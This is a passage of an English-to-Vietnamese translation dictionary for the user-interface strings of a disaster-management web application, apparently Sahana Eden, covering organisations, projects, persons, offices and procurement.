'No role to delete': 'Không có chức năng nào để xóa', 'No roles currently assigned to this user.': 'Hiện tại không có chức năng nào được cấp cho người sử dụng này', 'No service profile available': 'Không có hồ sơ đăng ký dịch vụ nào', 'No staff or volunteers currently registered': 'Hiện không có cán bộ hay tình nguyện viên nào được đăng ký', 'No stock adjustments have been done': 'Không có bất kỳ điều chỉnh nào về hàng hóa', 'No synchronization': 'Chưa đồng bộ hóa', 'No tasks currently registered': 'Hiện không có công việc nào được đăng ký', 'No template found!': 'Không tìm thấy mẫu', 'No themes found': 'Không tìm thấy chủ đề nào', 'No translations exist in spreadsheet': 'Không có phần dịch trong bảng tính', 'No users with this role at the moment.': 'Hiện tại không có người sử dụng nào có chức năng này', 'No valid data in the file': 'Không có dữ liệu có giá trị trong tệp tin', 'No volunteer information registered': 'Chưa đăng ký thông tin tình nguyện viên', 'No vulnerability aggregated indicators currently defined': 'Hiện không xác định được chỉ số tổng hợp về tình trạng dễ bị tổn thương', 'No vulnerability data currently defined': 'Hiện không xác định được dữ liệu về tình trạng dễ bị tổn thương', 'No vulnerability indicator Sources currently defined': 'Hiện không xác định được nguồn chỉ số về tình trạng dễ bị tổn thương', 'No vulnerability indicators currently defined': 'Hiện không xác định được chỉ số về tình trạng dễ bị tổn thương', 'No': 'Không', 'Non-Communicable Diseases': 'Bệnh không lây nhiễm', 'None (no such record)': 'Không cái nào (không có bản lưu như thế)', 'None': 'Không có', 'Nonexistent or invalid resource': 'Không tồn tại hoặc nguồn lực không hợp lệ', 'Noodles': 'Mì', 'Normal Job': 'Công việc hiện nay', 'Normal': 'Bình thường', 'Not Authorized': 'Không được phép', 'Not Set': 'Chưa thiết đặt', 'Not implemented': 'Không được thực hiện', 'Not installed or incorrectly configured.': 'Không được cài đặt hoặc cài đặt cấu hình không chính xác', 'Not yet a Member of any Group': 'Hiện không có nhóm hội viên nào được đăng ký', 'Not you?': 'Không phải bạn chứ?', 'Note that when using geowebcache, this can be set in the GWC config.': 'Lưu ý khi sử dụng geowebcache, phần này có thể được cài đặt trong cấu hình GWC.', 'Note: Make sure that all the text cells are quoted in the csv file before uploading': 'Lưu ý: Đảm bảo tất cả các ô chữ được trích dẫn trong tệp tin csv trước khi tải lên', 'Notice to Airmen': 'Lưu ý cho phi công', 'Notification frequency': 'Tần suất thông báo', 'Notification method': 'Phương pháp thông báo', 'Notify': 'Thông báo', 'Number of Completed Assessment Forms': 'Số phiếu đánh giá đã được hoàn chỉnh', 'Number of People Affected': 'Số người bị ảnh hưởng', 'Number of People Dead': 'Số người chết', 'Number of People Injured': 'Số người bị thương', 'Number of People Required': 'Số người cần', 'Number of Rows': 'Số hàng', 'Number of alternative places for studying': 'Số địa điểm có thể dùng làm trường học tạm thời', 'Number of newly admitted patients during the past 24 hours.': 'Số lượng bệnh nhân tiếp nhận trong 24h qua', 'Number of private schools': 'Số lượng trường tư', 'Number of religious schools': 'Số lượng trường công giáo', 'Number of vacant/available beds in this hospital. Automatically updated from daily reports.': 'Số các giường bệnh trống trong bệnh viện. Tự động cập nhật từ các báo cáo hàng ngày.', 'Number or Label on the identification tag this person is wearing (if any).': 'Số hoặc nhãn trên thẻ nhận diện mà người này đang đeo (nếu có)', 'Number': 'Số', 'Number/Percentage of affected population that is Female & Aged 0-5': 'Đối tượng nữ trong độ tuổi 0-5 tuổi chịu ảnh hưởng của thiên tai ', 'Number/Percentage of affected population that is Female & Aged 6-12': 'Đối tượng nữ trong độ tuổi 6-12 chịu ảnh hưởng của thiên tai', 'Number/Percentage of affected population that is Male & Aged 0-5': 'Đối tượng nam trong độ tuổi 0-5 chịu ảnh hưởng từ thiên tai', 'Number/Percentage of affected population that is Male & Aged 18-25': 'Đối tượng nam giới trong độ tuổi 18-25 chịu ảnh hưởng của thiên tai', 'Number/Percentage of affected population that is Male & Aged 26-60': 'Đối tượng là Nam giới và trong độ tuổi từ 26-60 chịu ảnh hưởng lớn từ thiên tai', 'Numbers Only': 'Chỉ dùng số', 'Numeric': 'Bằng số', 'Nutrition': 'Dinh dưỡng', 'OCR Form Review': 'Mẫu OCR tổng hợp', 'OCR module is disabled. Ask the Server Administrator to enable it.': 'Module OCR không được phép. Yêu cầu Quản trị mạng cho phép', 'OCR review data has been stored into the database successfully.': 'Dự liệu OCR tổng hợp đã được lưu thành công vào kho dữ liệu', 'OK': 'Đồng ý', 'OSM file generation failed!': 'Chiết xuất tệp tin OSM đã bị lỗi!', 'OSM file generation failed: %s': 'Chiết xuất tệp tin OSM đã bị lỗi: %s', 'OTHER DATA': 'DỮ LIỆU KHÁC', 'OTHER REPORTS': 'BÁO CÁO KHÁC', 'OVERALL RESILIENCE': 'SỰ BỀN VỮNG TỔNG THỂ', 'Object': 'Đối tượng', 'Objectives': 'Mục tiêu', 'Observer': 'Người quan sát', 'Obsolete': 'Đã thôi hoạt động', 'Obstetrics/Gynecology': 'Sản khoa/Phụ khoa', 'Office Address': 'Địa chỉ văn phòng', 'Office Details': 'Thông tin về văn phòng', 'Office Phone': 'Điện thoại văn phòng', 'Office Type Details': 'Thông tin về loại hình văn phòng', 'Office Type added': 'Loại hình văn phòng được thêm vào', 'Office Type deleted': 'Loại hình văn phòng đã xóa', 'Office Type updated': 'Loại hình văn phòng được cập nhật', 'Office Type': 'Loại hình văn phòng', 'Office Types': 'Loại văn phòng', 'Office added': 'Văn phòng được thêm vào', 'Office deleted': 'Văn phòng đã xóa', 'Office updated': 'Văn phòng được cập nhật', 'Office': 'Văn phòng', 'Office/Center': 'Văn phòng/Trung tâm', 'Office/Warehouse/Facility': 'Trụ sở làm việc', 'Officer': 'Chuyên viên', 'Offices': 'Văn phòng', 'Old': 'Người già', 'On Hold': 'Tạm dừng', 'On Order': 'Theo đề nghị', 'On by default?': 'Theo mặc định?', 'One item is attached to this shipment': 'Một mặt hàng được bổ sung thêm vào kiện hàng này', 'One-time costs': 'Chí phí một lần', 'Ongoing': 'Đang thực hiện', 'Only showing accessible records!': 'Chỉ hiển thị hồ sơ có thể truy cập', 'Only use this button to accept back into stock some items that were returned from a delivery to beneficiaries who do not record the shipment details directly into the system': 'Chỉ sử dụng nút này để nhận lại vào kho một số mặt hàng được trả lại do người nhận không trực tiếp lưu thông tin về kiện hàng này trên hệ thống', 'Only use this button to confirm that the shipment has been received by a destination which will not record the shipment directly into the system': 'Chỉ sử dụng nút này để xác nhận kiện hàng đã được nhận tại một địa điểm không trực tiếp lưu thông tin về kiện hàng trên hệ thống', 'Oops! Something went wrong...': 'Xin lỗi! Có lỗi gì đó…', 'Oops! something went wrong on our side.': 'Xin lỗi! Có trục trặc gì đó từ phía chúng tôi.', 'Opacity': 'Độ mờ', 'Open Incidents': 'Mở sự kiện', 'Open Map': 'Mở bản đồ', 'Open Tasks for %(project)s': 'Các công việc chưa xác định cho %(project)s', 'Open Tasks for Project': 'Mở nhiệm vụ cho một dự án', 'Open recent': 'Mở gần đây', 'Open': 'Mở', 'OpenStreetMap Layer': 'Mở lớp bản đồ đường đi', 'OpenStreetMap OAuth Consumer Key': 'Mã khóa người sử dụng OpenStreetMap OAuth', 'OpenStreetMap OAuth Consumer Secret': 'Bí mật người sử dụng OpenStreetMap OAuth', 'OpenWeatherMap Layer': 'Lớp OpenWeatherMap (bản đồ thời tiết mở)', 'Operating Rooms': 'Phòng điều hành', 'Operation not permitted': 'Hoạt động không được phép', 'Option Other': 'Lựa chọn khác', 'Option': 'Lựa chọn', 'Optional Subject to put into Email - can be used as a Security Password by the service provider': 'Chủ đề tùy chọn để đưa vào Thư điện tử - có thể được sử dụng như một Mật khẩu bảo mật do nhà cung cấp dịch vụ cung cấp', 'Optional password for HTTP Basic Authentication.': 'Mật khẩu tùy chọn cho Sự xác thực cơ bản HTTP.', 'Optional selection of a MapServer map.': 'Tùy chọn một bản đồ trong Máy chủ bản đồ.', 'Optional selection of a background color.': 'Tùy chọn màu sắc cho nền.', 'Optional selection of an alternate style.': 'Tùy chọn một kiểu dáng thay thế.', 'Optional username for HTTP Basic Authentication.': 'Tên truy nhập tùy chọn cho Sự xác thực cơ bản HTTP.', 'Optional. If you wish to style the features based on values of an attribute, select the attribute to use here.': 'Tùy chọn. Nếu bạn muốn tự tạo ra chức năng dựa trên các giá trị của một thuộc tính, hãy lựa chọn thuộc tính để sử dụng tại đây.', 'Optional. In GeoServer, this is the Workspace Namespace URI (not the name!). Within the WFS getCapabilities, this is the FeatureType Name part before the colon(:).': 'Tùy chọn. Trong máy chủ về địa lý, đây là Vùng tên Vùng làm việc URI (không phải là một tên gọi!). Trong lớp WFS theo khả năng là đường dẫn, đây là phần Tên loại chức năng trước dấu hai chấm (:).', 'Optional. The name of an element whose contents should be a URL of an Image file put into Popups.': 'Tùy chọn. Tên của một bộ phận có chứa nội dung là một URL của một tệp tin hình ảnh được đưa vào các cửa sổ tự động hiển thị.', 'Optional. The name of an element whose contents should be put into Popups.': 'Tùy chọn. Tên của một bộ phận có chứa nội dung được đưa vào các cửa sổ tự động hiển thị.', 'Optional. The name of the schema. In Geoserver this has the form http://host_name/geoserver/wfs/DescribeFeatureType?version=1.1.0&;typename=workspace_name:layer_name.': 'Tùy chọn. Tên của sơ đồ. Trong Geoserver tên này có dạng http://tên máy chủ/geoserver/wfs/Mô tả Loại Đặc điểm ?phiên bản=1.1.0&;nhập tên=vùng làm việc_tên:lớp_tên.', 'Options': 'Các lựa chọn', 'Or add a new language code': 'Hoặc chọn một ngôn ngữ khác', 'Order Created': 'Đơn hàng đã tạo', 'Order Details': 'Thông tin đơn hàng', 'Order Due %(date)s': 'Thời hạn của đơn hàng %(date)s', 'Order Item': 'Các mặt hàng trong đơn hàng', 'Order canceled': 'Đơn hàng đã bị hủy', 'Order updated': 'Đơn hàng được cập nhật', 'Order': 'Đơn hàng', 'Orders': 'Các đơn hàng', 'Organization Details': 'Thông tin về tổ chức', 'Organization Domain Details': 'Thông tin về lĩnh vực hoạt động của tổ chức', 'Organization Domain added': 'Lĩnh vực hoạt động của tổ chức đã được thêm', 'Organization Domain deleted': 'Lĩnh vực hoạt động của tổ chức đã được xóa', 'Organization Domain updated': 'Lĩnh vực hoạt động của tổ chức đã được cập nhật', 'Organization Domains': 'Loại hình hoạt động của tổ chức', 'Organization Registry': 'Đăng ký tổ chức', 'Organization Type Details': 'Thông tin về loại hình tổ chức', 'Organization Type added': 'Loại hình tổ chức được thêm vào', 'Organization Type deleted': 'Loại hình tổ chức đã xóa', 'Organization Type updated': 'Loại hình tổ chức được cập nhật', 'Organization Type': 'Loại hình tổ chức', 'Organization Types': 'Loại hình tổ chức', 'Organization Units': 'Đơn vị của tổ chức', 'Organization added to Framework': 'Tổ chức được thêm vào Chương trình khung', 'Organization added to Project': 'Tổ chức được thêm vào Dự án', 'Organization added': 'Tổ chức được thêm vào', 'Organization deleted': 'Tổ chức đã xóa', 'Organization removed from Framework': 'Tổ chức đã rút ra khỏi Chương trình khung', 'Organization removed from Project': 'Tổ chức đã rút ra khỏi Dự án', 'Organization updated': 'Tổ chức được cập nhật', 'Organization': 'Tổ chức', 'Organization/Supplier': 'Tổ chức/ Nhà cung cấp', 'Organizational Development': 'Phát triển tổ chức', 'Organizations / Teams / Facilities': 'Tổ chức/ Đội/ Cơ sở hạ tầng', 'Organizations': 'Tổ chức', 'Organized By': 'Đơn vị tổ chức', 'Origin': 'Nguồn gốc', 'Original Quantity': 'Số lượng ban đầu', 'Original Value per Pack': 'Giá trị ban đầu cho mỗi gói hàng', 'Other Address': 'Địa chỉ khác', 'Other Details': 'Thông tin khác', 'Other Employment': 'Quá trình công tác ngoài Chữ thập đỏ', 'Other Evidence': 'Bằng chứng khác', 'Other Faucet/Piped Water': 'Các đường xả lũ khác', 'Other Inventories': 'Kho hàng khác', 'Other Isolation': 'Những vùng bị cô lập khác', 'Other Users': 'Người sử dụng khác', 'Other activities of boys 13-17yrs': 'Các hoạt động khác của nam thanh niên từ 13-17 tuổi', 'Other activities of boys <12yrs before disaster': 'Các hoạt động khác của bé trai dưới 12 tuổi trước khi xảy ra thiên tai', 'Other alternative places for study': 'Những nơi có thể dùng làm trường học tạm thời', 'Other assistance needed': 'Các hỗ trợ cần thiết', 'Other assistance, Rank': 'Những sự hỗ trợ khác,thứ hạng', 'Other data': 'Dữ liệu khác', 'Other factors affecting school attendance': 'Những yếu tố khác ảnh hưởng đến việc đến trường', 'Other reports': 'Báo cáo khác', 'Other settings can only be set by editing a file on the server': 'Cài đặt khác chỉ có thể được cài đặt bằng cách sửa đổi một tệp tin trên máy chủ', 'Other side dishes in stock': 'Món trộn khác trong kho', 'Other': 'Khác', 'Others': 'Khác', 'Outbound Mail settings are configured in models/000_config.py.': 'Cài đặt thư gửi ra nước ngoài được cấu hình thành các kiểu/000_config.py.', 'Outbox': 'Hộp thư đi', 'Outcomes, Impact, Challenges': 'Kết quả, Tác động, Thách thức', 'Outgoing SMS handler': 'Bộ quản lý tin nhắn SMS gửi đi', 'Output added': 'Đầu ra được thêm vào', 'Output deleted': 'Đầu ra đã xóa', 'Output updated': 'Đầu ra được cập nhật', 'Output': 'Đầu ra', 'Outputs': 'Các đầu ra', 'Over 60': 'Trên 60', 'Overall Resilience': 'Sự bền vững tổng thể', 'Overland Flow Flood': 'Dòng nước lũ lụt trên đất đất liền', 'Overlays': 'Lớp dữ liệu phủ', 'Owned By (Organization/Branch)': 'Sở hữu bởi (Tổ chức/ Chi nhánh)', 'Owned Records': 'Hồ sơ được sở hữu', 'Owned Resources': 'Nguồn lực thuộc sở hữu', 'Owner Driven Housing Reconstruction': 'Xây lại nhà theo nhu cầu của chủ nhà', 'Owning Organization': 'Tổ chức nắm quyền sở hữu', 'PASSA': 'Phương pháp tiếp cận có sự tham gia về nhận thức an toàn nhà ở', 'PIL (Python Image Library) not installed': 'PIL (thư viện ảnh Python) chưa cài đặt', 'PIL (Python Image Library) not installed, images cannot be embedded in the PDF report': 'PIL (thư viện ảnh Python) chưa được cài đặt, hình ảnh không thể gắn vào báo cáo dạng PDF', 'PIN number from Twitter (leave empty to detach account)': 'Số PIN từ Twitter (để trống để tách tài khoản)', 'PMER Development': 'Phát triển năng lực Báo cáo, đánh giá, giám sát và lập kế hoạch (PMER)', 'POOR': 'NGHÈO', 'POPULATION DENSITY': 'MẬT ĐỘ DÂN SỐ', 'POPULATION:': 'DÂN SỐ:', 'Pack': 'Gói', 'Packs': 'Các gói', 'Page': 'Trang', 'Paid': 'Đã nộp', 'Pan Map: keep the left mouse button pressed and drag the map': 'Dính bản đồ: giữ chuột trái và di chuột để di chuyển bản đồ', 'Parameters': 'Tham số', 'Parent Item': 'Mặt hàng cùng gốc', 'Parent Project': 'Dự án cùng gốc', 'Parent needs to be of the correct level': 'Phần tử cấp trên cần ở mức chính xác', 'Parent needs to be set for locations of level': 'Phần tử cấp trên cần được cài đặt cho các điểm mức độ', 'Parent needs to be set': 'Phần tử cấp trên cần được cài đặt', 'Parent': 'Phần tử cấp trên', 'Parser Setting deleted': 'Cài đặt của bộ phân tích đã xóa', 'Parser Settings': 'Các cài đặt của bộ phân tích', 'Parsing Settings': 'Cài đặt cú pháp', 'Parsing Status': 'Tình trạng phân tích', 'Parsing Workflow': 'Quá trình phân tích', 'Part of the URL to call to access the Features': 'Phần URL để gọi để truy cập tới chức năng', 'Part-time': 'Kiêm nhiệm', 'Partial': 'Một phần', 'Participant Details': 'Thông tin về người tham dự', 'Participant added': 'Người tham dự được thêm vào', 'Participant deleted': 'Người tham dự đã xóa', 'Participant updated': 'Người tham dự được cập nhật', 'Participant': 'Người tham dự', 'Participants': 'Những người tham dự', 'Participating Organizations': 'Các tổ chức tham gia', 'Partner National Society': 'Hội Quốc gia thành viên', 'Partner Organization Details': 'Thông tin về tổ chức đối tác', 'Partner Organization added': 'Tổ chức đối tác được thêm vào', 'Partner Organization deleted': 'Tổ chức đối tác đã xóa', 'Partner Organization updated': 'Tổ chức đối tác đã được cập nhật', 'Partner Organizations': 'Tổ chức đối tác', 'Partner': 'Đối tác', 'Partners': 'Đối tác', 'Partnerships': 'Hợp tác', 'Pass': 'Qua', 'Passport': 'Hộ chiếu', 'Password to use for authentication at the remote site.': 'Mật khẩu để sử dụng để xác định tại một địa điểm ở xa', 'Password': 'Mật khẩu', 'Pathology': 'Bệnh lý học', 'Patients': 'Bệnh nhân', 'Pediatric ICU': 'Chuyên khoa nhi', 'Pediatric Psychiatric': 'Khoa Tâm thần dành cho bệnh nhi', 'Pediatrics': 'Khoa Nhi', 'Peer Registration Request': 'yêu cầu đăng ký', 'Peer registration request added': 'Đã thêm yêu cầu đăng ký', 'Peer registration request updated': 'Cập nhật yêu cẩu đăng ký', 'Pending Requests': 'yêu cầu đang chờ', 'Pending': 'Đang xử lý', 'People Trapped': 'Người bị bắt', 'People': 'Người', 'Percentage': 'Phần trăm', 'Performance Rating': 'Đánh giá quá trình thực hiện', 'Permanent Home Address': 'Địa chỉ thường trú', 'Permanent': 'Biên chế', 'Person (Count)': 'Họ tên (Số lượng)', 'Person Details': 'Thông tin cá nhân', 'Person Registry': 'Cơ quan đăng ký nhân sự', 'Person added to Commitment': 'Người được thêm vào Cam kết', 'Person added to Group': 'Người được thêm vào Nhóm', 'Person added to Team': 'Người được thêm vào Đội', 'Person added': 'Người được thêm vào', 'Person deleted': 'Người đã xóa', 'Person details updated': 'Thông tin cá nhân được cập nhật', 'Person must be specified!': 'Người phải được chỉ định!', 'Person or OU': 'Người hay OU', 'Person removed from Commitment': 'Người đã xóa khỏi Cam kết', 'Person removed from Group': 'Người đã xóa khỏi Nhóm', 'Person removed from Team': 'Người đã xóa khỏi Đội', 'Person reporting': 'Báo cáo về người', 'Person who has actually seen the person/group.': 'Người đã thực sự nhìn thấy người/ nhóm', 'Person who observed the presence (if different from reporter).': 'Người quan sát tình hình (nếu khác với phóng viên)', 'Person': 'Họ tên', 'Personal Effects Details': 'Chi tiết ảnh hưởng cá nhân', 'Personal Profile': 'Hồ sơ cá nhân', 'Personal': 'Cá nhân', 'Personnel': 'Nhân viên', 'Persons with disability (mental)': 'Người tàn tật (về tinh thần)', 'Persons with disability (physical)': 'Người tàn tật (về thể chất)', 'Persons': 'Họ tên', 'Philippine Pesos': 'Đồng Pê sô Phi-lip-pin', 'Phone #': 'Số điện thoại', 'Phone 1': 'Điện thoại 1', 'Phone 2': 'Điện thoại 2', 'Phone number is required': 'Yêu cầu nhập số điện thoại', 'Phone': 'Điện thoại', 'Photo Details': 'Thông tin về ảnh', 'Photo added': 'Ảnh được thêm vào', 'Photo deleted': 'Ảnh đã xóa', 'Photo updated': 'Ảnh được cập nhật', 'Photograph': 'Ảnh', 'Photos': 'Những bức ảnh', 'Place of Birth': 'Nơi sinh', 'Place of registration for health-check and medical treatment': 'Nơi đăng ký khám chữa bệnh', 'Place of registration': 'Nơi đăng ký BHXH', 'Place on Map': 'Vị trí trên bản đồ', 'Place': 'Nơi', 'Planned %(date)s': 'Đã lập kế hoạch %(date)s', 'Planned Procurement Item': 'Mặt hàng mua sắm theo kế hoạch', 'Planned Procurement': 'Mua sắm theo kế hoạch', 'Planned Procurements': 'Những trường hợp mua sắm đã lập kế hoạch', 'Planned': 'Đã lập kế hoạch', 'Please do not remove this sheet': 'Xin vui lòng không xóa bảng này', 'Please enter a First Name': 'Vui lòng nhập họ', 'Please enter a Warehouse/Facility/Office OR an Organization': 'Xin vui lòng nhập một Nhà kho/ Bộ phận/ Văn phòng HOẶC một Tổ chức', 'Please enter a Warehouse/Facility/Office': 'Xin vui lòng nhập một Nhà kho/ Bộ phận/ Văn phòng', 'Please enter a first name': 'Xin vui lòng nhập một tên', 'Please enter a last name': 'Xin vui lòng nhập một họ', 'Please enter a number only': 'Vui lòng chỉ nhập một số', 'Please enter a valid email address': 'Vui lòng nhập địa chỉ email hợp lệ', 'Please enter a valid email address.': 'Vui lòng nhập địa chỉ email hợp lệ', 'Please enter an Organization/Supplier': 'Xin vui lòng nhập một Tổ chức/ Nhà cung cấp', 'Please enter the first few letters of the Person/Group for the autocomplete.': 'Xin vui lòng nhập những chữ cái đầu tiên của Tên/ Nhóm để tự động dò tìm.', 'Please enter the recipient(s)': 'Xin vui lòng nhập người nhận', 'Please fill this!': 'Xin vui lòng nhập thông tin vào đây!', 'Please provide the URL of the page you are referring to, a description of what you expected to happen & what actually happened.': 'Vui lòng cung cấp đường dẫn trang bạn muốn tham chiếu tới, miêu tả bạn thực sự muốn gì và cái gì đã thực sự xảy ra.', 'Please record Beneficiary according to the reporting needs of your project': 'Xin vui lòng lưu thông tin Người hưởng lợi theo những nhu cầu về báo cáo của dự án của bạn', 'Please review demographic data for': 'Xin vui lòng rà soát lại số liệu dân số để', 'Please review indicator ratings for': 'Xin vui lòng rà soát lại những đánh giá về chỉ số để', 'Please select another level': 'Xin vui lòng lựa chọn một cấp độ khác', 'Please select': 'Xin vui lòng lựa chọn', 'Please use this field to record any additional information, including a history of the record if it is updated.': 'Vui lòng sử dụng ô này để điền thêm các thông tin bổ sung, bao gồm cả lịch sử của hồ sơ nếu được cập nhật.', 'Please use this field to record any additional information, such as Ushahidi instance IDs. Include a history of the record if it is updated.': 'Xin vui lòng sử dụng ô này để điền thông tin bổ sung, như là tên truy nhập phiên bản Ushahidi. Bao gồm một lịch sử của hồ sơ nếu được cập nhật.', 'PoIs successfully imported.': 'PoIs đã được nhập thành công.', 'Poisoning': 'Sự nhiễm độc', 'Poisonous Gas': 'Khí độc', 'Policy Development': 'Xây dựng chính sách', 'Political Theory Education': 'Trình độ Lý luận chính trị', 'Pollution and other environmental': 'Ô nhiễm và các vấn đề môi trường khác', 'Polygon': 'Đa giác', 'Poor': 'Nghèo', 'Population Report': 'Báo cáo dân số', 'Population': 'Dân số', 'Popup Fields': 'Các trường cửa sổ tự động hiển thị', 'Popup Label': 'Nhãn cửa sổ tự động hiển thị', 'Porridge': 'Cháo yến mạch', 'Port Closure': 'Cổng đóng', 'Port': 'Cổng', 'Portable App': 'Ứng dụng di động', 'Portal at': 'Cổng thông tin', 'Position': 'Vị trí', 'Positions': 'Những vị trí', 'Post Graduate': 'Trên đại học', 'Postcode': 'Mã bưu điện', 'Posts': 'Thư tín', 'Poultry restocking, Rank': 'Thu mua gia cầm, thứ hạng', 'Power Failure': 'Lỗi nguồn điện', 'Powered by ': 'Cung cấp bởi', 'Powered by Sahana Eden': 'Cung cấp bởi Sahana Eden', 'Powered by': 'Cung cấp bởi', 'Preferred Name': 'Tên thường gọi', 'Presence Condition': 'Điều kiện xuất hiện', 'Presence Log': 'Lịch trình xuất hiện', 'Presence': 'Sự hiện diện', 'Previous View': 'Hiển thị trước', 'Previous': 'Trang trước', 'Primary': 'Sơ cấp', 'Principal Officer': 'Chuyên viên chính', 'Print / Share': 'In ra / Chia sẻ', 'Print Extent': 'Kích thước in', 'Print Map': 'In bản đồ', 'Printed from Sahana Eden': 'Được in từ Sahana Eden', 'Printing disabled since server not accessible': 'Chức năng in không thực hiện được do không thể kết nối với máy chủ', 'Priority from 1 to 9. 1 is most preferred.': 'Thứ tự ưu tiên từ 1 đến 9. 1 được ưu tiên nhất.', 'Priority': 'Ưu tiên', 'Privacy': 'Riêng tư', 'Private-Public Partnerships': 'Hợp tác tư nhân và nhà nước', 'Problem Administration': 'Quản lý vấn đề', 'Problem connecting to twitter.com - please refresh': 'Vấn đề khi kết nối với twitter.com - vui lòng làm lại', 'Problem updated': 'Đã cập nhật vấn đề', 'Problem': 'Vấn đề', 'Problems': 'Vấn đề', 'Procedure': 'Thủ tục', 'Process Received Shipment': 'Thủ tục nhận lô hàng', 'Process Shipment to Send': 'Thủ tục gửi lô hàng', 'Processing': 'Đang xử lý', 'Procured': 'Được mua', 'Procurement Plans': 'Kế hoạch mua sắm', 'Profession': 'Nghề nghiệp', 'Professional Experience Details': 'Thông tin về kinh nghiệm nghề nghiệp', 'Professional Experience added': 'Kinh nghiệm nghề nghiệp đã được thêm vào', 'Professional Experience deleted': 'Kinh nghiệm nghề nghiệp đã xóa', 'Professional Experience updated': 'Kinh nghiệp nghề nghiệp được cập nhật', 'Professional Experience': 'Kinh nghiệm nghề nghiệp', 'Profile Configuration removed': 'Cấu hình hồ sơ đã xóa', 'Profile Configuration updated': 'Cấu hình hồ sơ được cập nhật', 'Profile Configuration': 'Cấu hình hồ sơ', 'Profile Configurations': 'Các cấu hình hồ sơ', 'Profile Configured': 'Hồ sơ đã được cài đặt cấu hình', 'Profile Details': 'Thông tin về hồ sơ', 'Profile Picture': 'Ảnh hồ sơ', 'Profile Picture?': 'Ảnh đại diện?', 'Profile': 'Hồ sơ', 'Profiles': 'Các hồ sơ', 'Program (Count)': 'Chương trình (Số lượng)', 'Program Details': 'Thông tin về chương trình', 'Program Hours (Month)': 'Thời gian tham gia chương trình (Tháng)', 'Program Hours (Year)': 'Thời gian tham gia chương trình (Năm)', 'Program Hours': 'Thời gian tham gia chương trình', 'Program added': 'Chương trình đã được thêm vào', 'Program deleted': 'Chương trình đã xóa', 'Program updated': 'Chương trình được cập nhật', 'Program': 'Chương trình tham gia', 'Programme Planning and Management': 'Quản lý và lập kế hoạch Chương trình', 'Programme Preparation and Action Plan, Budget & Schedule': 'Xây dựng Chương trình và Kế hoạch hành động, lập ngân sách và lịch hoạt động', 'Programs': 'Chương trình', 'Project Activities': 'Các hoạt động của dự án', 'Project Activity': 'Hoạt động của dự án', 'Project Assessments and Planning': 'Lập kế hoạch và đánh giá dự án', 'Project Beneficiary Type': 'Nhóm người hưởng lợi của dự án', 'Project Beneficiary': 'Người hưởng lợi của dự án', 'Project Calendar': 'Lịch dự án', 'Project Details': 'Thông tin về dự án', 'Project Name': 'Tên dự án', 'Project Organization Details': 'Thông tin về tổ chức của dự án', 'Project Organization updated': 'Tổ chức dự án được cập nhật', 'Project Organizations': 'Các tổ chức dự án', 'Project Time Report': 'Báo cáo thời gian dự án', 'Project Title': 'Tên dự án', 'Project added': 'Dự án được thêm vào', 'Project deleted': 'Dự án đã xóa', 'Project not Found': 'Không tìm thấy dự án', 'Project updated': 'Dự án được cập nhật', 'Project': 'Dự án', 'Projection Details': 'Thông tin dự đoán', 'Projection Type': 'Loại dự báo', 'Projection added': 'Dự đoán được thêm vào', 'Projection deleted': 'Dự đoán đã xóa', 'Projection updated': 'Dự đoán được cập nhật', 'Projection': 'Dự đoán', 'Projections': 'Nhiều dự đoán', 'Projects Map': 'Bản đồ dự án', 'Projects': 'Dự án', 'Proposed': 'Được đề xuất', 'Protecting Livelihoods': 'Bảo vệ Sinh kế', 'Protocol': 'Giao thức', 'Provide Metadata for your media files': 'Cung cấp lý lịch dữ liệu cho các tệp tin đa phương tiện', 'Provide a password': 'Cung cấp mật khẩu', 'Provider': 'Nơi đăng ký BHYT', 'Province': 'Tỉnh/thành', 'Provision of Tools and Equipment': 'Cung cấp công cụ và trang thiết bị', 'Proxy Server URL': 'Máy chủ ủy nhiệm URL', 'Psychiatrics/Pediatric': 'Khoa thần kinh/Khoa nhi', 'Psychosocial Support': 'Hỗ trợ tâm lý', 'Public Administration Education': 'Trình độ Quản lý nhà nước', 'Public Event': 'Sự kiện dành cho công chúng', 'Public and private transportation': 'Phương tiện vận chuyển công cộng và cá nhân', 'Public': 'Công khai', 'Purchase Data': 'Dữ liệu mua hàng', 'Purchase Date': 'Ngày mua hàng', 'Purchase': 'Mua hàng', 'Purpose': 'Mục đích', 'Pyroclastic Flow': 'Dòng dung nham', 'Pyroclastic Surge': 'Núi lửa phun trào', 'Python Serial module not available within the running Python - this needs installing to activate the Modem': 'Modun số liệu Python không sẵn có trong Python đang chạy - cần cài đặt để kích hoạt modem', 'Python needs the ReportLab module installed for PDF export': 'Chưa cài đặt kho báo cáo', 'Python needs the xlrd module installed for XLS export': 'Chạy Python cần xlrd module được cài đặt để chiết xuất định dạng XLS', 'Python needs the xlwt module installed for XLS export': 'Chạy Python cần xlwt module được cài đặt để chiết xuất định dạng XLS', 'Quantity Committed': 'Số lượng cam kết', 'Quantity Fulfilled': 'Số lượng đã được cung cấp', 'Quantity Received': 'Số lượng đã nhận được', 'Quantity Returned': 'Số lượng được trả lại', 'Quantity Sent': 'Số lượng đã gửi', 'Quantity in Transit': 'Số lượng đang được vận chuyển', 'Quantity': 'Số lượng', 'Quarantine': 'Cách ly để kiểm dịch', 'Queries': 'Thắc mắc', 'Query Feature': 'Đặc tính thắc mắc', 'Query': 'Yêu cầu', 'Queryable?': 'Có thể yêu cầu?', 'Question Details': 'Thông tin về câu hỏi', 'Question Meta-Data Details': 'Chi tiết lý lịch dữ liệu về câu hỏi', 'Question Meta-Data added': 'Lý lịch dữ liệu về câu hỏi được thêm vào', 'Question Meta-Data deleted': 'Lý lịch dữ liệu về câu hỏi đã xóa', 'Question Meta-Data updated': 'Lý lịch dữ liệu về câu hỏi được cập nhật', 'Question Meta-Data': 'Lý lịch dữ liệu về câu hỏi', 'Question Summary': 'Tóm tắt câu hỏi', 'Question': 'Câu hỏi', 'RC historical employment record': 'Quá trình công tác tại Hội', 'READ': 'ĐỌC', 'REPORTS': 'BÁO CÁO', 'RESET': 'THIẾT LẬP LẠI', 'RESILIENCE': 'AN TOÀN', 'REST Filter': 'Bộ lọc REST', 'RFA Priorities': 'Những ưu tiên RFA', 'RFA1: Governance-Organisational, Institutional, Policy and Decision Making Framework': 'RFA1: Quản trị - Về tổ chức, Về thể chế, Chính sách và Khung ra quyết định', 'RFA2: Knowledge, Information, Public Awareness and Education': 'RFA2: Kiến thức, Thông tin, Nhận thức của công chúng và Đào tạo', 'RFA3: Analysis and Evaluation of Hazards, Vulnerabilities and Elements at Risk': 'RFA3: Phân tích và Đánh giá Hiểm họa, Tình trạng dễ bị tổn thương và Những yếu tố dễ gặp rủi ro', 'RFA4: Planning for Effective Preparedness, Response and Recovery': 